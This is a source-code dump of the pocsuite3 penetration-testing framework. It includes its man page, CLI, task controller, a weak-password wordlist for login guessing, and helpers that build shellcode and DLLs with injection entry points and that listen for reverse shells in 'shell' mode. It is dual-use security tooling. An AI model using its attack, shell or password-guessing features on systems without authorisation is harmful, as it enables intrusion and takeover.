\fB\-\-plugins\fR PLUGINS
Load plugins to execute
.TP
\fB\-\-pocs\-path\fR POCS_PATH
User defined poc scripts path
.TP
\fB\-\-threads\fR THREADS
Max number of concurrent network requests (default 150)
.TP
\fB\-\-batch\fR BATCH
Automatically choose defalut choice without asking
.TP
\fB\-\-requires\fR
Check install_requires
.TP
\fB\-\-quiet\fR
Activate quiet mode, working without logger
.TP
\fB\-\-ppt\fR
Hiden sensitive information when published to the
network
.TP
\fB\-\-pcap\fR
use scapy capture flow
.TP
\fB\-\-rule\fR
export rules, default export request and response
.TP
\fB\-\-rule\-req\fR
only export request rule
.TP
\fB\-\-rule\-filename\fR RULE_FILENAME
Specify the name of the export rule file
.TP
\fB\-\-no\-check\fR
Disable URL protocol correction and honeypot check
.SS "Poc options:"
.IP
definition options for PoC
.TP
\fB\-\-options\fR
Show all definition options
.SH EXAMPLES
.PP
.br
Run poc with verify mode, poc will be only used for vulnerability scanning.
.PP
.br
\fI% pocsuite -r poc_example.py -u http://example.com/ --verify\fR
.PP
.br
Run poc with attack mode, and it may allow hackers/researchers break into labs.
.PP
.br
\fI% pocsuite -r poc_example.py -u http://example.com/ --attack\fR
.PP
.br
Run poc with shell mode, if executed successfully, pocsuite will drop into interactive shell.
.PP
.br
\fI% pocsuite -r poc_example.py -u http://example.com/ --shell\fR
.PP
.br
Using multiple threads, the default number of threads is 150.
.PP
.br
\fI% pocsuite -r poc_example.py -u http://example.com/ --verify --threads 20\fR
.PP
.br
Scan multiple targets given in a textual file.
.PP
.br
\fI% pocsuite -r poc_example.py -f url.txt --verify\fR
.PP
.br
.SH "SEE ALSO"
The full documentation for
.B pocsuite3
is maintained at:
.br
.I https://pocsuite.org
.PP
.SH VERSION
This manual page documents pocsuite3 version 2.0.5
.SH AUTHOR
.br
(c) 2014-present by Knownsec 404 Team
.br
<404-team@knownsec.com>
.LP
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; Version 2 with the clarifications and
exceptions described below. This guarantees your right to use, modify, and
redistribute this software under certain conditions. If you wish to embed
pocsuite3 technology into proprietary software, we sell alternative licenses
(contact 404-team@knownsec.com).
.PP
Manual page started by 13ph03nix
<abcnsxyz@gmail.com>
.PP
================================================
FILE: pocsuite3/__init__.py
================================================
__title__ = 'pocsuite3'
__version__ = '2.1.0'
__author__ = 'Knownsec 404 Team'
__author_email__ = '404-team@knownsec.com'
__license__ = 'GPLv2'
__copyright__ = 'Copyright 2014-present Knownsec 404 Team'
__name__ = 'pocsuite3'
__package__ = 'pocsuite3'
from .lib.core.common import set_paths
from .cli import module_path
set_paths(module_path())
================================================
FILE: pocsuite3/api/__init__.py
================================================
import base64
import binascii
import collections
import json
import os
import re
import socket
import ssl
import struct
import textwrap
import time
import urllib
import zlib
from pocsuite3.lib.controller.controller import start
from pocsuite3.lib.core.common import (OrderedDict, OrderedSet, check_port,
encoder_bash_payload,
encoder_powershell_payload, get_host_ip,
get_host_ipv6, mosaic,
single_time_warn_message, urlparse)
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import PLUGIN_TYPE, POC_CATEGORY, VUL_TYPE
from pocsuite3.lib.core.interpreter_option import (OptBool, OptDict, OptFloat,
OptInteger, OptIP, OptItems,
OptPort, OptString)
from pocsuite3.lib.core.option import init, init_options
from pocsuite3.lib.core.plugin import PluginBase, register_plugin
from pocsuite3.lib.core.poc import Output, POCBase
from pocsuite3.lib.core.register import (load_file_to_module,
load_string_to_module, register_poc)
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.request import requests
from pocsuite3.lib.utils import (generate_shellcode_list, get_middle_text,
minimum_version_required, random_str)
from pocsuite3.lib.yaml.nuclei import Nuclei
from pocsuite3.modules.censys import Censys
from pocsuite3.modules.ceye import CEye
from pocsuite3.modules.fofa import Fofa
from pocsuite3.modules.httpserver import PHTTPServer
from pocsuite3.modules.hunter import Hunter
from pocsuite3.modules.interactsh import Interactsh
from pocsuite3.modules.listener import (BIND_PAYLOAD, REVERSE_PAYLOAD,
bind_shell, bind_tcp_shell,
bind_telnet_shell)
from pocsuite3.modules.quake import Quake
from pocsuite3.modules.seebug import Seebug
from pocsuite3.modules.shodan import Shodan
from pocsuite3.modules.spider import crawl
from pocsuite3.modules.zoomeye import ZoomEye
from pocsuite3.shellcodes import OSShellcodes, WebShell
def get_listener_ip():
return conf.connect_back_host
def get_listener_port():
return conf.connect_back_port
def get_current_poc_obj():
pass
def get_poc_options(poc_obj=None):
poc_obj = poc_obj or kb.current_poc
return poc_obj.get_options()
def get_results():
return kb.results
def init_pocsuite(options={}):
init_options(options)
init()
def start_pocsuite():
start()
================================================
FILE: pocsuite3/cli.py
================================================
import os
import sys
import threading
import time
import traceback
try:
import pocsuite3
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from pocsuite3.lib.core.option import init
from pocsuite3.lib.core.option import init_options
from pocsuite3.lib.core.exception import PocsuiteUserQuitException, PocsuiteSystemException
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.common import set_paths
from pocsuite3.lib.core.common import banner
from pocsuite3.lib.core.common import data_to_stdout
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.parse.cmd import cmd_line_parser
from pocsuite3.lib.controller.controller import start
def module_path():
"""
This will get us the program's directory
"""
return os.path.dirname(os.path.realpath(__file__))
def check_environment():
try:
os.path.isdir(module_path())
except Exception:
err_msg = "your system does not properly handle non-ASCII paths. "
err_msg += "Please move the pocsuite's directory to the other location"
logger.critical(err_msg)
raise SystemExit
def main():
"""
@function Main function of pocsuite when running from command line.
"""
try:
check_environment()
set_paths(module_path())
banner()
init_options(cmd_line_parser().__dict__)
data_to_stdout("[*] starting at {0}\n\n".format(time.strftime("%X")))
init()
try:
start()
except threading.ThreadError:
raise
except PocsuiteUserQuitException:
pass
except PocsuiteShellQuitException:
pass
except PocsuiteSystemException:
pass
except KeyboardInterrupt:
pass
except EOFError:
pass
except SystemExit:
pass
except Exception:
exc_msg = traceback.format_exc()
data_to_stdout(exc_msg)
raise SystemExit
finally:
data_to_stdout("\n[*] shutting down at {0}\n\n".format(time.strftime("%X")))
if __name__ == "__main__":
main()
================================================
FILE: pocsuite3/console.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2018/12/25 morning 10:49
# @Author : chenghs
# @File : console.py
import os
import sys
try:
import pocsuite3
except ImportError:
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))
from pocsuite3.cli import check_environment, module_path
from pocsuite3 import set_paths
from pocsuite3.lib.core.interpreter import PocsuiteInterpreter
from pocsuite3.lib.core.option import init_options
def main():
check_environment()
set_paths(module_path())
init_options()
poc = PocsuiteInterpreter()
poc.start()
if __name__ == '__main__':
main()
================================================
FILE: pocsuite3/data/password-top100.txt
================================================
admin
admin12
admin888
admin8
admin123
sysadmin
adminxxx
adminx
6kadmin
base
feitium
admins
root
roots
test
test1
test123
test2
password
aaaAAA111
888888
88888888
000000
00000000
111111
11111111
aaaaaa
aaaaaaaa
135246
135246789
123456
654321
12345
54321
123456789
1234567890
0
123qwe
123qweasd
qweasd
123asd
qwezxc
qazxsw
qazwsx
qazwsxedc
1qaz2wsx
zxcvbn
asdfgh
qwerty
qazxdr
qwaszx
111111
123123
123321
abcdef
abcdefg
!@#$%^
!@#$%
~!@#$%
%$#@!
^%$#@~!
88888
55555
aaaaa
asd123
qweasdzxc
zxcvb
asdfg
qwert
1
2
3
4
5
qwe
qwer
welcome
!@#123
111
12
123
123!@#
123654
123654789
123654789!
123go
1314520
133135136
13572468
19880118
1992724
20080808
3452510
360
360sb
376186027
3est
45189946
4816535
4lert
================================================
FILE: pocsuite3/lib/__init__.py
================================================
================================================
FILE: pocsuite3/lib/controller/__init__.py
================================================
================================================
FILE: pocsuite3/lib/controller/controller.py
================================================
import copy
import time
import requests
from prettytable import PrettyTable
from pocsuite3.lib.core.common import data_to_stdout, mosaic
from pocsuite3.lib.core.data import conf, cmd_line_options
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.exception import PocsuiteValidationException, PocsuiteSystemException
from pocsuite3.lib.core.poc import Output
from pocsuite3.lib.core.settings import CMD_PARSE_WHITELIST
from pocsuite3.lib.core.threads import run_threads
from pocsuite3.lib.utils import urlparse
from pocsuite3.modules.listener import handle_listener_connection
from pocsuite3.modules.listener.reverse_tcp import handle_listener_connection_for_console
def runtime_check():
if not kb.registered_pocs:
msg = "No poc specified, try 'pocsuite -h' or 'pocsuite --help' for more information"
logger.warn(msg)
raise PocsuiteSystemException(msg)
def start():
runtime_check()
tasks_count = kb.task_queue.qsize()
info_msg = "pocsusite got a total of {0} tasks".format(tasks_count)
logger.info(info_msg)
conf.threads = min(conf.threads, tasks_count)
logger.debug("pocsuite will open {} threads".format(conf.threads))
try:
run_threads(conf.threads, task_run)
logger.info("Scan completed,ready to print")
finally:
task_done()
if conf.mode == "shell" and not conf.api:
info_msg = "connect back ip: {0} port: {1}".format(mosaic(conf.connect_back_host), conf.connect_back_port)
logger.info(info_msg)
info_msg = "watting for shell connect to pocsuite"
logger.info(info_msg)
if conf.console_mode:
handle_listener_connection_for_console()
else:
handle_listener_connection()
def show_task_result():
if conf.quiet:
return
if not kb.results:
return
if conf.mode == "shell":
return
fields = ["target-url", "poc-name", "poc-id", "component", "version", "status"]
if kb.comparison:
fields.append("source")
fields.append("honey-pot")
results_table = PrettyTable(fields)
results_table.align["target-url"] = "l"
results_table.padding_width = 1
total_num, success_num = 0, 0
for row in kb.results:
data = [
row.target,
row.poc_name,
row.vul_id,
row.app_name,
row.app_version,
row.status,
]
if kb.comparison:
source, honey = kb.comparison.getinfo(row.target)
data.append(source)
data.append(honey)
results_table.add_row(data)
total_num += 1
if row.status == 'success':
success_num += 1
data_to_stdout('\n{0}'.format(results_table.get_string(sortby="status", reversesort=False)))
data_to_stdout("\nsuccess : {} / {}\n".format(success_num, total_num))
def check_docker_status(target):
if conf.docker_start:
info_msg = "wait for docker..."
logger.info(info_msg)
while True:
try:
resp = requests.get(target)
if resp.status_code:
break
except Exception:
pass
def task_run():
while not kb.task_queue.empty() and kb.thread_continue:
target, poc_module = kb.task_queue.get()
if not conf.console_mode:
poc_module = copy.deepcopy(kb.registered_pocs[poc_module])
poc_name = poc_module.name
# check container status
check_docker_status(target)
if conf.pcap:
# start capture flow
import os
import logging
os.environ["MPLBACKEND"] = "Agg"
logging.getLogger("scapy").setLevel(logging.ERROR)
from pocsuite3.lib.utils.pcap_sniffer import Sniffer
from scapy.utils import wrpcap
sniffer = Sniffer(urlparse(target).hostname)
if sniffer.use_pcap:
if not sniffer.is_admin:
logger.warn(
"Please use administrator privileges, and the poc will continue to execute "
"without fetching the packet")
conf.pcap = False
else:
sniffer.start()
# let scapy start for a while
time.sleep(1)
else:
logger.warn("No libpcap is detected, and the poc will continue to execute without fetching the packet")
conf.pcap = False
info_msg = "running poc:'{0}' target '{1}'".format(
poc_name,
mosaic(target)
)
if len(kb.targets) > 1:
info_msg += ", {0} tasks waiting to be executed.".format(kb.task_queue.qsize())
logger.info(info_msg)
# hand user define parameters
if hasattr(poc_module, "_options"):
for item in kb.cmd_line:
value = cmd_line_options.get(item, "")
if item in poc_module.options:
poc_module.set_option(item, value)
info_msg = "Parameter {0} => {1}".format(item, value)
logger.info(info_msg)
# check must be option
for opt, v in poc_module.options.items():
# check conflict in whitelist
if opt in CMD_PARSE_WHITELIST:
info_msg = (
"Poc:'{0}' You can't customize this variable '{1}' because it is already taken up "
"by the pocsuite.").format(poc_name, opt)
logger.error(info_msg)
raise SystemExit
if v.require and v.value == "":
info_msg = "Poc:'{poc}' Option '{key}' must be set, please add parameters '--{key}'".format(
poc=poc_name, key=opt)
logger.error(info_msg)
raise SystemExit
try:
result = poc_module.execute(target, headers=conf.http_headers, mode=conf.mode, verbose=False)
except PocsuiteValidationException as ex:
info_msg = "Poc:'{}' PocsuiteValidationException:{}".format(poc_name, ex)
logger.error(info_msg)
result = None
if not isinstance(result, Output) and not None:
_result = Output(poc_module)
if result:
if isinstance(result, bool):
_result.success({})
elif isinstance(result, str):
_result.success({"Info": result})
elif isinstance(result, dict):
_result.success(result)
else:
_result.success({"Info": repr(result)})
else:
_result.fail('target is not vulnerable')
result = _result
if not result:
continue
if not conf.quiet:
result.show_result()
result_status = "success" if result.is_success() else "failed"
if result_status == "success" and kb.comparison:
kb.comparison.change_success(target, True)
output = AttribDict(result.to_dict())
output.update({
'target': mosaic(target),
'poc_name': poc_name,
'created': time.strftime("%Y-%m-%d %X", time.localtime()),
'status': result_status
})
result_plugins_handle(output)
kb.results.append(output)
if conf.pcap:
sniffer.join(20)
if not sniffer.is_alive():
filename = urlparse(target).hostname + time.strftime('_%Y_%m_%d_%H%M%S.pcap')
logger.info(f"pcap data has been saved in: {mosaic(filename)}")
wrpcap(filename, sniffer.pcap.results)
else:
logger.error("Thread terminates timeout. Failed to save pcap")
# TODO
# set task delay
def result_plugins_start():
"""
run result plugins, such as html report
:return:
"""
for _, plugin in kb.plugins.results.items():
plugin.start()
def result_plugins_handle(output):
"""
run result plugins when execute poc
:return:
"""
for _, plugin in kb.plugins.results.items():
plugin.handle(output)
def result_compare_handle():
"""
show comparing data from various of search engine
:return:
"""
if not kb.comparison:
return
kb.comparison.output()
def task_done():
show_task_result()
result_plugins_start()
result_compare_handle()
================================================
FILE: pocsuite3/lib/core/__init__.py
================================================
================================================
FILE: pocsuite3/lib/core/clear.py
================================================
import logging
def remove_extra_log_message():
logger_names = [
"paramiko",
"paramiko.transport",
"websockets",
]
for logger_name in logger_names:
try:
logging.getLogger(logger_name).disabled = True
except Exception:
pass
================================================
FILE: pocsuite3/lib/core/common.py
================================================
# pylint: disable=E1101
import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
try:
collectionsAbc = collections.abc
except AttributeError:
collectionsAbc = collections
def urlparse(address):
# https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
try:
ip = ip_address(address)
if ip.version == 4:
return urllib.parse.urlparse(f'tcp://{address}')
elif ip.version == 6:
return urllib.parse.urlparse(f'tcp://[{address}]')
except ValueError:
pass
if not re.search(r'^[A-Za-z0-9+.\-]+://', address):
address = f'tcp://{address}'
return urllib.parse.urlparse(address)
def read_binary(filename):
content = ''
with open(filename, 'rb') as f:
content = f.read()
return content
def check_path(path):
return True if path and os.path.exists(path) else False
def check_file(filename):
"""
@function Checks for file existence and readability
"""
valid = True
if filename is None or not os.path.isfile(filename):
valid = False
if valid:
try:
with open(filename, "rb"):
pass
except Exception:
valid = False
if not valid:
raise PocsuiteSystemException("unable to read file '%s'" % filename)
return valid
def set_paths(root_path):
"""
Sets absolute paths for project directories and files
"""
paths.POCSUITE_ROOT_PATH = root_path
paths.POCSUITE_DATA_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "data")
paths.POCSUITE_PLUGINS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "plugins")
paths.POCSUITE_POCS_PATH = os.path.join(paths.POCSUITE_ROOT_PATH, "pocs")
paths.USER_POCS_PATH = None
paths.WEAK_PASS = os.path.join(paths.POCSUITE_DATA_PATH, "password-top100.txt")
paths.POCSUITE_HOME_PATH = os.path.expanduser("~")
_ = os.path.join(paths.POCSUITE_HOME_PATH, ".pocsuite")
paths.API_SHELL_HISTORY = os.path.join(_, "api.hst")
paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
paths.POCSUITE_SHELL_HISTORY = os.path.join(_, "pocsuite.hst")
paths.POCSUITE_CONSOLE_HISTORY = os.path.join(_, "console.hst")
paths.POCSUITE_TMP_PATH = os.path.join(_, "tmp")
paths.POCSUITE_RC_PATH = os.path.join(paths.POCSUITE_HOME_PATH, ".pocsuiterc")
paths.POCSUITE_OUTPUT_PATH = paths.get("POCSUITE_OUTPUT_PATH", os.path.join(_, "output"))
paths.SHELLCODES_DEV_PATH = os.path.join(paths.POCSUITE_TMP_PATH, "tools")
def banner():
"""
Function prints pocsuite banner with its version
"""
_ = BANNER
# if not getattr(LOGGER_HANDLER, "is_tty", False):
# _ = clear_colors(_)
if IS_WIN:
coloramainit()
data_to_stdout(_)
def set_color(message, bold=False):
if isinstance(message, bytes):
message = message.decode(UNICODE_ENCODING)
ret = message
if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
if bold:
ret = colored(message, color=None, on_color=None, attrs=("bold",))
return ret
def clear_colors(message):
ret = message
if message:
ret = re.sub(r"\x1b\[[\d;]+m", "", message)
return ret
def boldify_message(message):
ret = message
if any(_ in message for _ in BOLD_PATTERNS):
ret = set_color(message, bold=True)
return ret
def data_to_stdout(data, bold=False):
"""
Writes text to the stdout (console) stream
"""
if not conf.get('quiet', False):
message = ""
if isinstance(data, str):
message = stdout_encode(data)
else:
message = data
sys.stdout.write(set_color(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
return
@cachedmethod
def extract_regex_result(regex, content, flags=0):
"""
Returns 'result' group value from a possible match with regex on a given
content
>>> extract_regex_result(r'a(?P<result>[^g]+)g', 'abcdefg')
'bcdef'
"""
ret = None
if regex and content and "?P<result>" in regex:
match = re.search(regex, content, flags)
if match:
ret = match.group("result")
return ret
def get_latest_revision():
"""
Retrieves latest revision from the offical repository
"""
ret = None
resp = requests.get(url="https://raw.githubusercontent.com/knownsec/pocsuite3/master/pocsuite3/__init__.py")
try:
content = resp.content
ret = extract_regex_result(r"__version__\s*=\s*[\"'](?P<result>[\d.]+)", content)
except Exception:
pass
return ret
def poll_process(process, suppress_errors=False):
"""
Checks for process status (prints . if still running)
"""
while True:
data_to_stdout(".")
time.sleep(1)
return_code = process.poll()
if return_code is not None:
if not suppress_errors:
if return_code == 0:
data_to_stdout(" done\n")
elif return_code < 0:
data_to_stdout(" process terminated by signal {}\n".format(return_code))
elif return_code > 0:
data_to_stdout(" quit unexpectedly with return code {}\n".format(return_code))
break
def parse_target_url(url):
"""
Parse target URL
"""
try:
pr = urlparse(url)
if pr.scheme.lower() not in ['http', 'https', 'ws', 'wss']:
url = pr._replace(scheme='https' if str(pr.port).endswith('443') else 'http').geturl()
except ValueError:
pass
return url
def is_url_format(value):
if value and re.match(URL_ADDRESS_REGEX, value):
return True
else:
return False
def is_domain_format(value):
if value and re.match(URL_DOMAIN_REGEX, value):
return True
else:
return False
def is_ip_address_format(value):
if value and re.match(IP_ADDRESS_REGEX, value):
return True
else:
return False
def is_ip_address_with_port_format(value):
if value and re.match(IP_ADDRESS_WITH_PORT_REGEX, value):
return True
else:
return False
def is_ipv6_address_format(value):
if value and re.match(IPV6_ADDRESS_REGEX, value):
return True
else:
return False
def is_ipv6_url_format(value):
if value and re.match(IPV6_URL_REGEX, value):
return True
else:
return False
def is_old_version_poc(poc_string):
for _ in OLD_VERSION_CHARACTER:
if _ in poc_string:
return True
return False
def is_pocsuite_poc(poc_string):
for _ in POCSUITE_VERSION_CHARACTER:
if _ in poc_string:
return True
return False
def is_pocsuite3_poc(poc_string):
return True if "pocsuite3" in poc_string else False
def multiple_replace(text, adict):
rx = re.compile("|".join(map(re.escape, adict)))
def get_replace(match):
return adict[match.group(0)]
return rx.sub(get_replace, text)
def get_filename(filepath, with_ext=True):
base_name = os.path.basename(filepath)
return base_name if with_ext else os.path.splitext(base_name)[0]
def get_md5(value):
if isinstance(value, str):
value = value.encode(encoding='UTF-8')
return hashlib.md5(value).hexdigest()
def extract_cookies(cookie):
cookies = dict([i.split("=", 1) for i in cookie.split("; ")])
return cookies
def get_file_items(filename, comment_prefix='#', unicode=True, lowercase=False, unique=False):
ret = list() if not unique else OrderedDict()
check_file(filename)
try:
with open(filename, 'rb') as f:
for line in f.readlines():
line = line.strip()
if unicode:
encoding = chardet.detect(line)['encoding'] or 'utf-8'
line = line.decode(encoding)
if comment_prefix and line.startswith(comment_prefix):
continue
if line:
if lowercase:
line = line.lower()
if unique and line in ret:
continue
if unique:
ret[line] = True
else:
ret.append(line)
except (IOError, OSError, MemoryError) as ex:
err_msg = "something went wrong while trying "
err_msg += "to read the content of file '{0}' ('{1}')".format(filename, ex)
raise PocsuiteSystemException(err_msg)
return ret if not unique else ret.keys()
def parse_target(address, additional_ports=[], skip_target_port=False):
# parse IPv4/IPv6 CIDR
targets = OrderedSet()
try:
hosts = list(ip_network(address, strict=False).hosts())
'''
fix https://github.com/knownsec/pocsuite3/issues/319
different python versions have different behaviors on ipaddress library
'''
try:
t = ip_address(address.replace('/32', '').replace('/128', ''))
if t not in hosts:
hosts.append(t)
except ValueError:
pass
for ip in hosts:
if ip.version == 6:
conf.ipv6 = True
if not skip_target_port:
targets.add(str(ip))
for probe in additional_ports:
probe = str(probe)
# [proto:]port
scheme, port = '', probe
if len(probe.split(':')) == 2:
scheme, port = probe.split(':')
if scheme:
targets.add(f'{scheme}://[{ip}]:{port}' if conf.get('ipv6', False) else f'{scheme}://{ip}:{port}')
else:
targets.add(f'[{ip}]:{port}' if conf.get('ipv6', False) else f'{ip}:{port}')
return targets
except ValueError:
pass
# URL
try:
if ip_address(urlparse(address).hostname).version == 6:
conf.ipv6 = True
except ValueError:
pass
if not skip_target_port:
targets.add(address)
try:
pr = urlparse(address)
for probe in additional_ports:
probe = str(probe)
# [proto:]port
scheme, port = '', probe
if len(probe.split(':')) == 2:
scheme, port = probe.split(':')
netloc = f'[{pr.hostname}]:{port}' if conf.get('ipv6', False) else f'{pr.hostname}:{port}'
t = pr._replace(netloc=netloc)
if scheme:
t = t._replace(scheme=scheme)
t = t.geturl()
if t.startswith('tcp://'):
t = t.lstrip('tcp://')
targets.add(t)
except ValueError:
pass
return targets
def parse_poc_docker_name(name):
return name.lower().replace(' ', '_')
def single_time_log_message(message, level=logging.INFO, flag=None):
if flag is None:
flag = hash(message)
if flag not in kb.single_log_flags:
kb.single_log_flags.add(flag)
logger.log(level, message)
def single_time_debug_message(message):
single_time_log_message(message, logging.DEBUG)
def single_time_warn_message(message):
single_time_log_message(message, logging.WARN)
@cachedmethod
def get_public_type_members(type_, only_values=False):
"""
Useful for getting members from types (e.g. in enums)
"""
ret = []
for name, value in inspect.getmembers(type_):
if not name.startswith("__"):
if not only_values:
ret.append((name, value))
else:
ret.append(value)
return ret
def is_local_ip(ip_string):
ret = False
if ip_string and isinstance(ip_string, str) and re.match(LOCAL_IP_ADDRESS_REGEX, ip_string):
ret = True
return ret
def get_local_ip(all=True):
"""Fetches all the local network address
"""
ips = OrderedSet()
wan_ipv4 = get_host_ip(check_private=False)
ips.add(wan_ipv4)
if not all:
return list(ips)
wan_ipv6 = get_host_ipv6()
if wan_ipv6:
ips.add(wan_ipv6)
# fix https://github.com/BVLC/caffe/issues/861
os.environ["MPLBACKEND"] = "Agg"
# fix https://github.com/secdev/scapy/issues/3216
logging.getLogger("scapy").setLevel(logging.ERROR)
from scapy.all import WINDOWS, get_if_list, get_if_addr
if WINDOWS:
from scapy.all import IFACES
for iface in sorted(IFACES):
dev = IFACES[iface]
ips.add(dev.ip)
else:
for iface in get_if_list():
ipv4 = get_if_addr(iface)
if ipv4 != '0.0.0.0':
ips.add(ipv4)
return list(ips)
def get_host_ip(dst='8.8.8.8', check_private=True):
""" Fetches source ipv4 address when connect to dst
Args:
dst <str>: target ip or domain
Returns:
<str>: source ip address
"""
# maybe docker env
if dst == ['127.0.0.1', 'localhost']:
dst = '8.8.8.8'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((dst, 80))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
if check_private and ip_address(ip).is_private:
logger.warn(
f'your wan ip {mosaic(ip)} is a private ip, '
'there may be some issues in the next stages of exploitation'
)
return ip
def has_poll():
return hasattr(select, "poll")
def get_poc_requires(code):
return extract_regex_result(POC_REQUIRES_REGEX, code)
def get_poc_name(code):
if re.search(r'register_poc', code):
return extract_regex_result(r"""(?sm)POCBase\):.*?name\s*=\s*['"](?P<result>.*?)['"]""", code)
elif re.search(r'matchers:\s*-', code):
return extract_regex_result(r"""(?sm)\s*name\s*:\s*(?P<result>[^\r\n]*).*matchers:""", code)
return ''
def is_os_64bit():
return machine().endswith('64')
def write_file(data, file_ext='', file_name=''):
"""
Function to create file
"""
if not file_ext.startswith('.'):
file_ext = '.' + file_ext
if not file_name:
file_name = TIMESTAMP
file_name += file_ext
file_path = os.path.join(paths.POCSUITE_TMP_PATH, file_name)
fd = open(file_path, 'wb+')
fd.write(data)
fd.close()
return file_path
def search_file(filename, search_path):
"""
Given a search path, find file
"""
path = os.path.join(search_path, filename)
if os.path.exists(path):
return path
return None
def get_objective_code(asm_file, target_arch, debug=0):
"""
Get objective code (file: *.o)
"""
if target_arch == OS_ARCH.X86:
output_format = 'elf'
elif target_arch == OS_ARCH.X64:
output_format = 'elf64'
else:
print("Format for output objective file is not defined")
return None
if not asm_file:
print("You must specify some params passed to function")
return None
obj_file = (asm_file.split('.'))[0] + ".o"
app = 'nasm' # Application that do magic for us
if OS_SYSTEM == OS.WINDOWS:
app += '.exe'
find_app = search_file("%s" % app, paths.SHELLCODES_DEV_PATH)
if find_app:
if debug:
print("app: '%s' found at %s" % (app, find_app))
else:
print("You must install app: '%s' and maybe edit environment variables path to it" % app)
return None
elif OS_SYSTEM == OS.LINUX:
find_app = app
else:
print("Can't understand source os")
return None
command = "%s -f%s -o%s %s" % (find_app, output_format, obj_file, asm_file)
if debug:
print(command)
res = call([find_app, "-f", output_format, "-o", obj_file, asm_file])
if res == 0:
if debug:
print("Objective code has been created")
return obj_file
else:
print("Something wrong while getting objective code")
return None
def objdump(obj_file, os_target_arch, debug=0):
"""
Get shellcode with objdump utility
"""
res = ''
if not obj_file:
print("You must specify some params passed to function")
return None
else:
app = 'objdump'
if OS_SYSTEM == OS.WINDOWS:
app += ".exe"
find_app = search_file("%s" % app, paths.SHELLCODES_DEV_PATH)
if find_app:
if debug:
print("app: '%s' found at %s" % (app, find_app))
else:
print("You must install app: '%s' and maybe edit environment variables path to it" % app)
return None
elif OS_SYSTEM == OS.LINUX:
find_app = app
else:
print("Can't understand source os")
return None
if os_target_arch == OS_ARCH.X86:
p = Popen(['%s' % find_app, '-d', obj_file], stdout=PIPE, stderr=PIPE)
elif os_target_arch == OS_ARCH.X64:
p = Popen(['%s' % find_app, '-d', obj_file, '--disassembler-options=addr64'], stdout=PIPE, stderr=PIPE)
else:
print("OS TARGET ARCH '%s' is not supported" % os_target_arch)
return
(stdout, stderr) = p.communicate()
if p.returncode == 0:
for line in stdout.splitlines():
cols = line.split('\t')
if len(cols) >= 2:
for b in [b for b in cols[1].split(' ') if b != '']:
res = res + ('\\x%s' % b)
else:
raise ValueError(stderr)
if res and debug:
print("objdump is created")
return res
def create_shellcode(asm_code, os_target, os_target_arch, make_exe=0, debug=0, filename="", dll_inj_funcs=[]):
if os_target == OS.LINUX:
dll_inj_funcs = []
if not is_os_64bit() and os_target_arch == OS_ARCH.X64:
print("ERR: can not create shellcode for this os_target_arch ({0}) on os_arch ({1})".format(os_target_arch,
OS_ARCH.X64))
return None
asm_file = write_file(asm_code, '.asm', filename)
obj_file = get_objective_code(asm_file, os_target_arch, debug)
# stage_2:
if obj_file:
shellcode = objdump(obj_file, os_target_arch, debug)
shellcode = shellcode.replace('\\x', '').decode('hex')
# shellcode = extract_shell_from_obj(obj_file)
else:
return None
if make_exe:
make_binary_from_obj(obj_file, os_target, os_target_arch, debug)
if dll_inj_funcs:
generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_funcs, debug)
return shellcode, asm_file.split(".")[0]
def generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_funcs, debug):
asm_code = asm_code.replace("global _start", "").replace("_start:", "")
additional_code = ""
for func in dll_inj_funcs:
additional_code += "global _{}\r\n".format(func)
for func in dll_inj_funcs:
additional_code += "_{}:\r\n".format(func)
asm_code = additional_code + asm_code
asm_file = write_file(asm_code, '.asm', filename)
obj_file = get_objective_code(asm_file, os_target_arch, debug)
make_binary_from_obj(obj_file, os_target, os_target_arch, debug, True)
